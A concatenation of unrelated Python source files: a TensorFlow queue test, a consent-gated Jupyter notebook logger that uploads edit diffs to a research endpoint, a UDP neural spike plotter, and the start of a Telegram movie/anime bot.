blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
self.assertEqual([50.0], dequeued_t.eval())
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
time.sleep(0.01)
self.assertEqual([50.0], dequeued_t.eval())
self.assertEqual([60.0], dequeued_t.eval())
def testBlockingEnqueueBeforeClose(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, dequeued_t.eval())
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, dequeued_t.eval())
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, dequeued_t.eval())
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, dequeued_t.eval())
def testDoesNotLoseValue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(1, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.test_session():
q1 = tf.PaddingFIFOQueue(
1, tf.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = tf.PaddingFIFOQueue(
1, tf.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_a")
q_a_2 = tf.PaddingFIFOQueue(15, tf.float32, ((),), shared_name="q_a")
q_a_1.queue_ref.eval()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.eval()
q_b_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_b")
q_b_2 = tf.PaddingFIFOQueue(10, tf.int32, ((),), shared_name="q_b")
q_b_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.eval()
q_c_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_c")
q_c_2 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.eval()
q_d_1 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_d")
q_d_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.eval()
q_e_1 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.eval()
q_f_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_f")
q_f_2 = tf.PaddingFIFOQueue(
10, (tf.float32, tf.int32), ((), ()), shared_name="q_f")
q_f_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.eval()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(tf.PaddingFIFOQueue(10, tf.float32, ((),)))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = tf.PaddingFIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = tf.PaddingFIFOQueue(10, tf.float32, ((),))
q2 = tf.PaddingFIFOQueue(15, tf.float32, ((),))
enq_q = tf.PaddingFIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("Index must be in the range"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = tf.PaddingFIFOQueue(5, tf.float32, ((),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = tf.PaddingFIFOQueue(5, tf.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(self._blockingDequeueMany, args=(sess,
dequeue_many_op)),
self.checkedThread(self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(self._blockingEnqueueMany, args=(sess,
enqueue_many_op))]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(5, tf.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(2, tf.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.test_session() as sess:
dtypes = [tf.float32, tf.float64, tf.int32, tf.uint8, tf.int16, tf.int8,
tf.int64, tf.bool, tf.complex64]
shape = (32, 4, 128)
q = tf.PaddingFIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == tf.bool:
np_array = np_array > 0
elif dtype == tf.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = sess.run(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testUnknownRank(self):
with self.assertRaisesRegexp(ValueError, "must have a defined rank"):
tf.PaddingFIFOQueue(32, [tf.float32], [tf.TensorShape(None)])
if __name__ == "__main__":
tf.test.main()
OnlineLogger.py
import os
import sys
import time
import threading
import json
import datetime
import random
import requests
import uuid
from pathlib import Path
import zipfile
class Watcher(object):
running = True
refresh_delay_secs = 1
# Constructor
def __init__(self, watch_file, call_func_on_change=None, *args, **kwargs):
self._cached_stamp = 0
self.filename = watch_file
self.call_func_on_change = call_func_on_change
self.args = args
self.kwargs = kwargs
# Look for changes
def look(self):
stamp = os.stat(self.filename).st_mtime
if stamp != self._cached_stamp:
self._cached_stamp = stamp
# File has changed, so do something...
if self.call_func_on_change is not None:
self.call_func_on_change(*self.args, **self.kwargs)
# Keep watching in a loop
def watch(self):
while self.running:
try:
# Look for changes
time.sleep(self.refresh_delay_secs)
self.look()
except KeyboardInterrupt:
#print('\nDone')
break
except FileNotFoundError:
#print('File was not found. Please do not change the notebook name or its location relative to logger.py. Rerun the initialization cell once the filename/location is fixed.')
break
except:
#print('Stopping logging: Unhandled error: %s' % sys.exc_info())
return
class Pusher(object):
running = True
refresh_delay_secs = 1
# Constructor
def __init__(self, log_file, call_func_on_change=None, *args, **kwargs):
self._cached_stamp = 0
self.filename = log_file
self.call_func_on_change = call_func_on_change
self.args = args
self.kwargs = kwargs
# Look for changes
def look(self):
if (not os.path.isfile(self.filename)):
return
stamp = os.stat(self.filename).st_mtime
if stamp != self._cached_stamp:
self._cached_stamp = stamp
# File has changed, so do something...
if self.call_func_on_change is not None:
self.call_func_on_change(*self.args, **self.kwargs)
# Keep watching in a loop
def watch(self):
while self.running:
try:
# Look for changes
time.sleep(self.refresh_delay_secs)
self.look()
except KeyboardInterrupt:
#print('\nDone')
break
except FileNotFoundError:
#print('File was not found. Please do not change the notebook name or its location relative to logger.py. Rerun the initialization cell once the filename/location is fixed.')
break
except:
#print('Stopping logging: Unhandled error: %s' % sys.exc_info())
return
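# The helpers below compare two parsed notebook checkpoints (.ipynb JSON) and
# build a compact diff record: when the cell count is unchanged, only the
# indices and new contents of the cells that differ are stored; when cells were
# added or removed, the full new cell list is stored instead.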
def get_same_length_change(old_checkpoint, current_checkpoint):
change_count = 0
cell_array_number = []
cell_change_array = []
for i in range(0, len(current_checkpoint['cells'])):
old_cell = old_checkpoint['cells'][i]
new_cell = current_checkpoint['cells'][i]
if (old_cell != new_cell):
change_count += 1
cell_array_number.append(i)
cell_change_array.append(new_cell)
return change_count, cell_array_number, cell_change_array
def get_new_cell_set(new_checkpoint):
return 0, [], new_checkpoint['cells']
def get_changed_cells(old_checkpoint, current_checkpoint):
if len(old_checkpoint['cells']) == len(current_checkpoint['cells']):
num_changes, cells_changed, new_contents = get_same_length_change(old_checkpoint, current_checkpoint)
return num_changes, cells_changed, "cells_changed", new_contents
if len(old_checkpoint['cells']) != len(current_checkpoint['cells']):
num_changes, cells_changed, new_contents = get_new_cell_set(current_checkpoint)
return num_changes, cells_changed, "all_cell_refresh", new_contents
return 0, [], "error", []
def get_diff_dict(old_checkpoint, current_checkpoint, current_time):
diff_dict = {}
num_changes, cell_changed, change_type, new_content = get_changed_cells(old_checkpoint, current_checkpoint)
diff_dict.update({'time' : current_time,
"num_changes" : num_changes,
"cells_changed" : cell_changed,
"change_type" : change_type,
"new_contents" : new_content
})
return diff_dict
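# The next three helpers trim code-cell outputs before a checkpoint is logged:
# parse_lines caps each output line at 200 characters, parse_cell keeps at most
# the first 20 lines of each text output, and parse_checkpoint applies this to
# every code cell so the log file stays small.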
def parse_lines(line_array):
new_array = []
for i in line_array:
if len(i) > 200:
new_line = i[0:200]
new_line = new_line + "\n"
new_array.append(new_line)
continue
new_array.append(i)
return new_array
def parse_cell(current_cell):
if "outputs" not in current_cell:
return current_cell
all_outputs = current_cell['outputs']
if len(all_outputs) == 0:
return current_cell
new_outputs = []
for i in all_outputs:
if "text" not in i:
new_outputs.append(i)
continue
all_text = i['text']
all_text = parse_lines(all_text)
if len(all_text) < 20:
new_outputs.append(i)
continue
new_text = all_text[0:20]
i.update({'text' : new_text})
new_outputs.append(i)
current_cell.update({'outputs' : new_outputs})
return current_cell
def parse_checkpoint(current_checkpoint):
cells = current_checkpoint['cells']
new_cells = []
for i in cells:
if i['cell_type'] != "code":
new_cells.append(i)
continue
new_cell = parse_cell(i)
new_cells.append(new_cell)
current_checkpoint.update({'cells': new_cells})
return current_checkpoint
def push_log(log_filename):
if not os.path.isfile(log_filename):
return
log = None
with open(log_filename, 'r') as f:
log = json.loads(f.read())
push_to_cloud(log)
def push_to_cloud(log):
url = 'https://us-south.functions.appdomain.cloud/api/v1/web/ORG-UNC-dist-seed-james_dev/cyverse/add-cyverse-log'
help_data = {
"body": {
"log_id": log['log_id'],
"machine_id": log['machine_id'],
"course_id": log['course_id'],
"log_type": "Jupyter",
"log": log
}
}
try :
requests.post(url, json=help_data)
except:
pass
# Call this function each time a change happens
def logger(base_filename, course_id):
src_path = os.path.realpath(base_filename)
dir_path = os.path.dirname(src_path)
historicalSize = -1
while (historicalSize != os.path.getsize(src_path)):
historicalSize = os.path.getsize(src_path)
time.sleep(0.25)
with open(src_path, 'r') as checkpoint_source:
checkpoint = json.loads(checkpoint_source.read())
checkpoint = parse_checkpoint(checkpoint)
log = Path(os.path.join(dir_path, base_filename.split('.')[0]+'_log.json'))
if log.is_file():
old = ''
with open(log, 'r') as f:
try:
old = json.loads(f.read())
except json.decoder.JSONDecodeError:
#print('There is an error decoding log. Log file may be corrupt')
return
current_checkpoint = old['current_checkpoint']['checkpoint']
should_update = current_checkpoint != checkpoint
if should_update:
with open(log, 'w') as f:
current_time = str(datetime.datetime.now())
old["diffs"].append(get_diff_dict(current_checkpoint, checkpoint, current_time))
old['current_checkpoint'].update({
"time": current_time,
"checkpoint" : checkpoint
})
f.write(json.dumps(old))
else:
with open(log, "w") as f:
log_id = str(random.randint(10000000000000000, 99999999999999999))
mac = hex(uuid.getnode() >> 2)
machine_id = str(mac)
new = {
"log_id": log_id,
"machine_id" : machine_id,
"course_id": course_id,
"original_checkpoint":{"time":str(datetime.datetime.now()),"checkpoint":checkpoint},
"current_checkpoint" : {"time":str(datetime.datetime.now()),"checkpoint":checkpoint},
"diffs" : []
}
f.write(json.dumps(new))
def start(watch_file, course_id = "NoCourseSpecified" ,IRB_consent = True):
if IRB_consent:
print('Logging your work!')
watcher = Watcher(watch_file, logger, base_filename=watch_file, course_id=course_id)
log_file = watch_file.split('.')[0] + "_log.json"
pusher = Pusher(log_file, push_log, log_filename=log_file)
thread = threading.Thread(target=lambda: watcher.watch(), daemon=True)
thread.start()
thread_push = threading.Thread(target=lambda: pusher.watch(), daemon=True)
thread_push.start()
else:
print('Please give consent to logging data by updating agreement variable to True')
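# A minimal usage sketch (the notebook name below is illustrative only):
#
#   import OnlineLogger
#   OnlineLogger.start("lab1.ipynb", course_id="COMP110", IRB_consent=True)
#
# start() launches two daemon threads: a Watcher that re-runs logger() whenever
# the notebook file changes (appending a diff to lab1_log.json), and a Pusher
# that calls push_log() to upload the log file whenever it changes.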
def compress_log(watch_file):
base_filename = watch_file
filename_stem = base_filename.split('.')[0]
src_path = os.path.realpath(base_filename)
dir_path = os.path.dirname(src_path)
log = Path(os.path.join(dir_path, filename_stem+'_log.json'))
if log.is_file():
log_zip = zipfile.ZipFile(filename_stem+'.compressed', 'w')
log_zip.write(log, filename_stem+'_log.json', compress_type=zipfile.ZIP_DEFLATED)
log_zip.close()
print('Compressed log to: ' + str(os.path.join(dir_path, filename_stem+'.compressed')))
else:
print('Log file not found. Nothing to compress.')
pass
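# compress_full_log converts a "full" log (a flat list of complete checkpoints
# under the 'checkpoints' key) into a compact form similar to the one logger()
# writes: one original checkpoint, one current checkpoint, and a diff entry for
# every consecutive pair of checkpoints in between.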
def compress_full_log(full_log_file, output_log_file):
src_path = os.path.realpath(full_log_file)
dir_path = os.path.dirname(src_path)
log = full_log_file
new_log = output_log_file
old = None
with open(log, 'r') as f:
try:
old = json.loads(f.read())
except json.decoder.JSONDecodeError:
print('There is an error decoding log. Log file may be corrupt')
return
compressed_log = None
if len(old['checkpoints']) > 0:
oldest_checkpoint = old['checkpoints'][0]
newest_checkpoint = old['checkpoints'][len(old['checkpoints']) - 1]
compressed_log = {"original_checkpoint":{"time":oldest_checkpoint['time'],"checkpoint": parse_checkpoint(oldest_checkpoint['checkpoint'])},
"current_checkpoint" : {"time":newest_checkpoint['time'],"checkpoint": parse_checkpoint(newest_checkpoint['checkpoint'])},
"diffs" : []
}
for i in range(0, len(old['checkpoints']) - 1):
current_time = old['checkpoints'][i+1]['time']
compressed_log['diffs'].append(get_diff_dict(parse_checkpoint(old['checkpoints'][i]['checkpoint']), parse_checkpoint(old['checkpoints'][i + 1]['checkpoint']), current_time))
else:
return
with open(new_log, "w") as g:
g.write(json.dumps(compressed_log))
return
def get_rebuilt_cells(previous_checkpoint_cells, diff_record):
if diff_record['change_type'] == "all_cell_refresh":
return diff_record['new_contents']
all_current_cells = previous_checkpoint_cells.copy()
for i in range(0, diff_record['num_changes']):
cell_to_change = diff_record['cells_changed'][i]
all_current_cells[cell_to_change] = diff_record['new_contents'][i]
return all_current_cells
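# decompress_compressed_log is the inverse operation: starting from
# original_checkpoint, it replays each stored diff with get_rebuilt_cells to
# reconstruct the flat list of checkpoints.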
def decompress_compressed_log(compressed_log, output_full_file):
compressed = None
with open(compressed_log, 'r') as f:
try:
compressed = json.loads(f.read())
except json.decoder.JSONDecodeError:
print('There is an error decoding log. Log file may be corrupt')
return
full_log = {"checkpoints" : []}
starting_checkpoint = compressed['original_checkpoint']
full_log['checkpoints'].append(starting_checkpoint)
for i in range(0, len(compressed['diffs'])):
diff_info = compressed['diffs'][i]
new_cell_array = get_rebuilt_cells(starting_checkpoint['checkpoint']['cells'], diff_info)
checkpoint_dict = {}
checkpoint_dict.update({
"time" : diff_info['time'],
"checkpoint" : {'cells' : new_cell_array,
'metadata' : starting_checkpoint['checkpoint']['metadata'],
'nbformat' : starting_checkpoint['checkpoint']['nbformat'],
'nbformat_minor': starting_checkpoint['checkpoint']['nbformat_minor']}
})
full_log['checkpoints'].append(checkpoint_dict)
starting_checkpoint = checkpoint_dict
with open(output_full_file, "w") as g:
g.write(json.dumps(full_log))
return
OnlineSpikePlot.py
#!/usr/bin/env python
'''
This is the input node that receives spikes and generates a plot.
LINUX VERSION!
'''
import numpy
import socket
import sys
import argparse
import matplotlib.pyplot as plt
import time
from multiprocessing import Process, Pipe
from select import select
# import os, signal
# to read back the generated file
# import json
# with open('my_file') as f:
# my_list = [json.loads(line) for line in f]
def converts_spikes_into_plot(spike_numpy_array, x, y, step):
"""
spike_numpy_array => the numpy array received directly from my system (a numpy array with 1's and 0's) and the
same length as NumOfNeuronsInput.
returns a plot line object
"""
for i,j in zip(spike_numpy_array,range(len(spike_numpy_array))):
if i==1: # Is there a spike in the index j?
x.append(step)
y.append(j)
return (x,y)
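# Example with hypothetical values: for spike_numpy_array = [0, 1, 0, 1] at
# step 12, the indices of the 1's are appended, so x becomes [12, 12] and
# y becomes [1, 3] -- one (time, neuron) point per spike.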
def saves_to_file(spikes_pipe_in, filename):
"""
"""
start_time=time.time()*1000.0 # time in milliseconds
while True:
x=list()
y=list()
if select([spikes_pipe_in],[],[]):
time_step=int(time.time()*1000.0 - start_time)
x,y = converts_spikes_into_plot(spikes_pipe_in.recv(), x, y, time_step)
with open(filename,"a") as f:
f.write(str([x,y]))
f.write('\n')
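# Each pass through the loop above appends one line of the form [x, y] (a
# Python list repr, which for these integer lists is also valid JSON), matching
# the per-line json.loads read-back snippet in the header comment.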
def draw_plots(spikes_pipe_in, cmd_pipe_in, number_of_neurons, save_file):
print "Starting Online Spike Plot"
fig = plt.figure()
plt.title("Real time Spike Plot")
step=0
time_step=0
start_time=time.time()*1000.0 # time in milliseconds
x=list()
y=list()
# Until this point, the code is going to be executed only once each time the system runs.
try:
while True:
if select([spikes_pipe_in],[],[]):
if spikes_pipe_in.poll():
time_step=int(time.time()*1000.0 - start_time)
# plt.axis([start_time,time_step+1,-1,number_of_neurons])
plt.ylim(-1,number_of_neurons)
# Adjusts the axes according to the number of spikes published.
x,y = converts_spikes_into_plot(spikes_pipe_in.recv(), x, y, time_step)
# plt.scatter(x,y)
plt.plot(x,y,'b.')
step+=1
if step > steps:
step=0
# start_time=time.time()*1000.0 # time in milliseconds
x=[]
y=[]
plt.pause(0.0001)
plt.clf()
# Here the figure is created / updated.
except KeyboardInterrupt:
if args.save != 'None': # 'None' is compared as a string because that is how the user passes it on the command line.
print
print "Saving figure! Wait..."
fig.savefig(save_file)
print "Saving figure! Wait...Done!"
# sys.exit(0)
def read_UDP(pipe_out_draw, pipe_out_file, IPI, PORTI, number_of_neurons, clean):
"""
This function simply creates a socket, reads all the UDP packets as they arrive and redirects to a multiprocessing.Pipe.
IPI = "X.X.X.X" ordinary IP address from one of the network interfaces
PORTI = 0 to 65535 (but you need to choose a free one)
number_of_neurons = is the size of the spike train
pipe_out = multiprocessing.Pipe used to send the information received through UDP to the draw_plots
clean = when True, flushes the receiving buffer before starting
"""
buffer_size = 8 + number_of_neurons # Each element of the numpy.array with the uint8 occupies 1 byte.
# So, the brian_address has 8 elements, therefore 8 bytes.
# number_of_neurons: because each neuron occupies 1 byte (numpy.uint8)
sockI = socket.socket(socket.AF_INET, # IP
socket.SOCK_DGRAM) # UDP
sockI.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Tells the OS that if someone else is using the PORT, it
# can use the same PORT without any error/warning msg.
# Actually this is useful because if you restart the simulation
# the OS is not going to release the socket so fast and an error
# could occur.
sockI.bind((IPI, PORTI)) # Bind the socket to the IPI/PORTI
if clean:
clean_loop = 1
while clean_loop:
print "Cleaning receiving buffer...", "IP/PORT:", IPI, "/", PORTI
try:
data = sockI.recv(1, socket.MSG_DONTWAIT) # buffer size is 1 byte, NON blocking.
print data
except IOError: # The try and except are necessary because the recv raises a error when no data is received
clean_loop = 0
print "Cleaning receiving buffer...", "IP/PORT:", IPI, "/", PORTI, "...Done!"
sockI.setblocking(1) # Tells the system that the socket recv() method will DO block until a packet is received
while True:
# Receives the spike train from the pipe, converts according to the converts_spikes_into_plot function
try:
received_raw_data = sockI.recv(buffer_size) # This is a blocking command, therefore the while loop is not going
# to eat up all the processor time.
numpy_data = numpy.fromstring(received_raw_data[8:], dtype=numpy.uint8)
pipe_out_draw.send(numpy_data)
if filename != None:
pipe_out_file.send(numpy_data)
# The first 8 bytes are the brian_address, so I don't need them here
except IOError: # Without the IOError even the keyboard "control+C" is caught here!
print "UDP read error?"
pass
except ValueError:
print "ValueError:", data # DEBUG!
pass #the data is corrupted, a wrong package appeared at the port, etc...
except KeyboardInterrupt:
pass # Just to disable the msgs...
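# Packet layout assumed by read_UDP: the first 8 bytes carry the brian_address
# and are discarded; the remaining number_of_neurons bytes form a numpy.uint8
# vector with one 0/1 entry per neuron.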
if __name__=="__main__":
# Process the information received from the command line arguments.
parser = argparse.ArgumentParser(description="Generate a \"real time\" plot of the spikes coming from the IP/PORT.")
parser.add_argument("--IP", help="IP Address to receive the spikes.", type=str, default="192.168.1.100")
parser.add_argument("--PORT", help="PORT to receive the spikes.", type=int, default=30303)
parser.add_argument("--NON", help="Number of neurons the spike train has.", type=int, default=600)
parser.add_argument("--steps", help="Number of steps to be plotted.", type=int, default=100)
parser.add_argument("--file", help="Saves the data received to a file.", type=str, default=None)
parser.add_argument("--save", help="Saves the figure after receive a Ctrl+C. If set as None, nothing is saved.", type=str, default="OnlineSpikePlot" + str(time.time()) + ".png")
parser.add_argument("--clean", help="Cleans the receiving buffer before start.", action="store_true")
args=parser.parse_args()
steps = args.steps
filename = args.file
IPI = args.IP
PORTI = args.PORT
number_of_neurons = args.NON
command_r, command_w = Pipe(duplex=False)
UDP_draw_r, UDP_draw_w = Pipe(duplex=False)
UDP_file_r, UDP_file_w = Pipe(duplex=False)
generate_plots = Process(target=draw_plots, args=(UDP_draw_r, command_r, number_of_neurons, args.save))
read_socket = Process(target=read_UDP, args=(UDP_draw_w, UDP_file_w, IPI, PORTI, number_of_neurons, args.clean))
if filename != None:
save_plots = Process(target=saves_to_file, args=(UDP_file_r, filename))
generate_plots.daemon = True # Guarantees the process will die after the main python
if filename != None:
save_plots.daemon = True # Guarantees the process will die after the main python
read_socket.daemon = True # Guarantees the process will die after the main python
read_socket.start()
generate_plots.start()
if filename != None:
save_plots.start()
try:
while True:
print "Run!"
if select([],[],[]):
print "Never!"
pass
except KeyboardInterrupt:
print
if args.save != "None":
time.sleep(5) # Gives time to save the image
read_socket.terminate()
generate_plots.terminate()
if filename != None:
save_plots.terminate()
time.sleep(.1)
sys.exit("Exiting the online spike plot!")
# os.kill(os.getppid(), signal.SIGQUIT) #or signal.SIGKILL
|
__main__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# MIT License
# Copyright (c) 2020 Stɑrry Shivɑm // This file is part of AcuteBot
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os, sys, importlib
from threading import Thread
from acutebot import LOG, dp, updater, DEV_ID
from acutebot.funcs import ALL_FUNCS
import acutebot.helpers.strings as st
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from telegram.ext.dispatcher import run_async
from telegram.ext import CommandHandler, CallbackQueryHandler, Filters
# Import all funcs in main
for func_name in ALL_FUNCS:
imported_module = importlib.import_module("acutebot.funcs." + func_name)
class Starter:
def __init__(self, name):
self.photo = "https://telegra.ph/file/47a7fb822017512f0ee65.jpg"
self.text = st.START_STRING.format(name)
self.reply_markup = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
text="Movie", switch_inline_query_current_chat="<movie> ",
),
InlineKeyboardButton(
text="TVshow", switch_inline_query_current_chat="<tv> ",
),
InlineKeyboardButton(
text="Anime", switch_inline_query_current_chat="<anime> ",
),
],
[InlineKeyboardButton(text="Help and Commands❔", callback_data="help")],
]
)
@run_async
def start(update, context):
if update.effective_chat.type == "private":
stuff = Starter(update.effective_user.first_name)
return update.effective_message.reply_photo(
photo=stuff.photo, caption=stuff.text, reply_markup=stuff.reply_markup
)
update.effective_message.reply_text(st.START_STRING_GRP)
@run_async
def help_button(update, context=None):
query = update.callback_query
query.answer()
query.message.edit_caption(
caption=st.HELP_STR,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(text="Movies & TV", callback_data="h_mv"),
InlineKeyboardButton(
text="Music & lyrics", callback_data="h_music"
),
],
[
InlineKeyboardButton(text="Anime & manga", callback_data="h_anime"),
InlineKeyboardButton(text="Miscellaneous", callback_data="h_misc"),
],
[
